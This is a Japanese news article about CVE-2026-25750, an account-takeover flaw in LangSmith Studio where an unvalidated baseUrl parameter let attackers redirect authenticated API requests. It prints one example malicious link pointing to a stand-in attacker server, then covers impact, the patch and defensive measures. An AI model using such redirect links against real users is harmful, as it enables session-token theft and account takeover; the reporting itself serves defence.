広く利用されているAIオブザーバビリティー・プラットフォーム、LangSmithに脆弱性があり、攻撃者がユーザーアカウントを乗っ取り、大規模言語モデル(LLM)システムを流れる企業の機密データにアクセスできた可能性がある。
Miggo Securityの研究者がこの欠陥を発見した。ログイン中のユーザーが悪意のあるWebページを訪問すると、トークンの窃取やアカウント乗っ取りにつながる可能性があった。
この脆弱性は「…ユーザーをトークン窃取やアカウント乗っ取りの危険にさらしていた」と述べた研究者ら。
CVE-2026-25750でアカウント乗っ取りが可能に
LangSmithは現代のAI開発・運用で中心的な役割を担っており、大規模言語モデル(LLM)アプリケーションを構築・展開する組織向けのオブザーバビリティー層として機能している。
このプラットフォームは、モデルの動作監視やエラーのトラブルシューティング、AIワークフロー中に生成される実行トレースの分析に広く利用されている。
実際には、企業がAIシステムを改善・維持する過程で、LangSmithは膨大な量のテレメトリーデータやデバッグデータを処理することになる。
LangSmithはアプリケーションロジック、内部ツール、企業のデータパイプラインが交差する場所に位置するため、極めて機密性の高い運用情報を含むことが多い。
トレースログには、実行時にAIシステムがデータベース、API、内部サービスとどのようにやり取りしたかを詳細に記録できる。
Miggo Securityの調査によると、脆弱性の悪用に成功した攻撃者は、これらのログに埋め込まれた機密データにアクセスできた可能性がある。そこには、内部SQLクエリー、独自のシステムプロンプト、APIレスポンス、さらには顧客記録まで含まれ得る。
LLMワークフローの監視をLangSmithに依存する組織では、アカウントが侵害されると、チャットログだけでなく、AIシステムを動かす基盤となるロジックやデータフローまで露出する可能性がある。
LangSmithの脆弱性の仕組み
この脆弱性はCVE-2026-25750として追跡されており、プラットフォームの開発者向けインターフェースであるLangSmith Studioの設定機能に起因していた。
Studioは、認証済みのクラウドアカウントにアクセスしながら、インターフェースをローカルまたはリモート環境で実行したい開発者に柔軟性を提供するよう設計されている。
この機能を実現するため、アプリケーションはbaseUrlパラメーターを受け付ける。このパラメーターは、Studioのインターフェースが通信すべきバックエンドAPIエンドポイントを指定する。
通常、このパラメーターを使えば、API呼び出しをステージング環境や開発環境など、別の環境へリダイレクトできる。
従来、アプリケーションはbaseUrlパラメーターに指定されたドメインを検証していなかった。そのためフロントエンドはユーザーが指定した値を信頼し、認証情報を含むAPIリクエストを、指定された任意の送信先に送信していた。
攻撃者がエクスプロイトを発動する方法
この検証の欠如により、攻撃者は認証済みリクエストをリダイレクトする悪意のあるURLを作成できた。
例えば、攻撃者は次のようなリンクを生成できる。
https://smith.langchain.com/studio/?baseUrl=https://attacker-server.com
LangSmithにすでにログインしていた被害者が、悪意のあるスクリプトや埋め込みリダイレクトによってこのURLを自動的に呼び出すWebページを訪問すると、ブラウザーは正規のLangSmith Studioインターフェースを読み込む。
しかしAPIリクエストは、公式のLangSmithバックエンドではなく、攻撃者が管理するサーバーへ密かにリダイレクトされる。
被害者はすでに認証済みのアクティブなセッションを持っていたため、ブラウザーはリクエストにユーザーのセッション認証情報を含める。
攻撃者はその後、リクエストを傍受してセッショントークンを取得し、被害者になりすますことができる。
攻撃者がアクセスできる情報
研究者によると、盗まれたセッショントークンは約5分間有効だった。攻撃者が被害者のアカウントにアクセスし、データを取得したり設定を変更したりするには十分な時間だ。
悪用に成功すると、攻撃者は組織のAIの動作を定義するシステムプロンプトを盗み、PII、PHI、財務記録などの機密データを含む可能性があるツールの入力・出力を抜き出し、プロジェクトを変更または削除できる。
公開時点で、この脆弱性が実際の攻撃で悪用された証拠はなく、問題に対処する修正プログラムはリリースされている。
AI監視プラットフォームのリスクを軽減する
AIオブザーバビリティー・プラットフォームが企業環境に組み込まれるにつれ、攻撃者にとって魅力的な標的になりつつある。
LangSmithの脆弱性は、設定やビジネスロジックの欠陥によって、AIシステムを流れる機密データが露出し得ることを示している。
組織はこれらのプラットフォームを重要インフラとして扱い、主要なクラウドサービスやデータパイプラインの保護に用いるのと同じ厳格なセキュリティ対策を適用すべきだ。
- パッチを適用し自己ホスト型LangSmithデプロイメントを最新バージョンに更新し、Allowed Originsポリシーによって悪意のあるbaseUrlリクエストがブロックされるようにする。
- 監視しログやプラットフォームのアクティビティを、通常とは異なるAPI呼び出し、予期しない外向きリクエスト、またはトークンの不正使用を示す可能性があるトレースデータへの異常なアクセスがないか確認する。
- セッショントークンをローテーションし、APIキーやその他の認証情報を、侵害が疑われる場合は可能な限りセッションの有効期間を短くする。
- AIオブザーバビリティー・トレース内で機密データが露出するリスクを制限し、監視システムに送られる前にプロンプト、レスポンス、ツールの出力をサニタイズする。
- 次のようなID管理を徹底する:MFAやSSOポリシー、さらにオブザーバビリティー・プラットフォームとAIツールに対する最小権限アクセスを適用する。
- ネットワークとブラウザーのセキュリティ制御を実装し、例えばDNSフィルタリング、外向きトラフィックの制限、安全なブラウザーポリシーなどを用いて、攻撃者が管理するドメインへの接続を防ぐ。
- 定期的にインシデント対応計画をテストし、AIオブザーバビリティー・プラットフォームの悪用を想定したプレイブックを整備し、攻撃シミュレーションツールを活用する。
これらの対策を総合的に講じることで、組織はアカウント乗っ取りのリスクへの露出を減らし、AIオブザーバビリティー・プラットフォームを標的とする攻撃への耐性を高められる。
AIインフラが攻撃対象領域を拡大
LangSmithの脆弱性は、組織がAIインフラについて考えるべき方法が広く変化していることを示している。
オブザーバビリティー・プラットフォームは現在、多くのAIパイプラインの中心に位置し、独自のプロンプト、運用ワークフロー、その他の企業機密情報を含み得るトレースデータを収集している。
こうしたツールはデバッグと透明性の向上を目的に設計されているが、セキュリティ制御が弱い場合、内部システムへのアクセス権を持つことから魅力的な標的になり得る。
この相互接続されたAIプラットフォームへの依存が高まっていることを受け、組織はゼロトラストソリューションへの移行を進めている。これは、システム、アプリケーション、ユーザーをデフォルトで信頼すべきではないとする考え方だ。





